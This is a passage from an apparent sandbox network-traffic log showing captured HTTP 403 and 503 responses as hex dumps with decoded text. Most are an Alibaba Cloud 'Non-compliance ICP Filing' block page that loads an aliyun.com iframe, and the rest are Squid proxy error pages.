20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:24 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:26 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 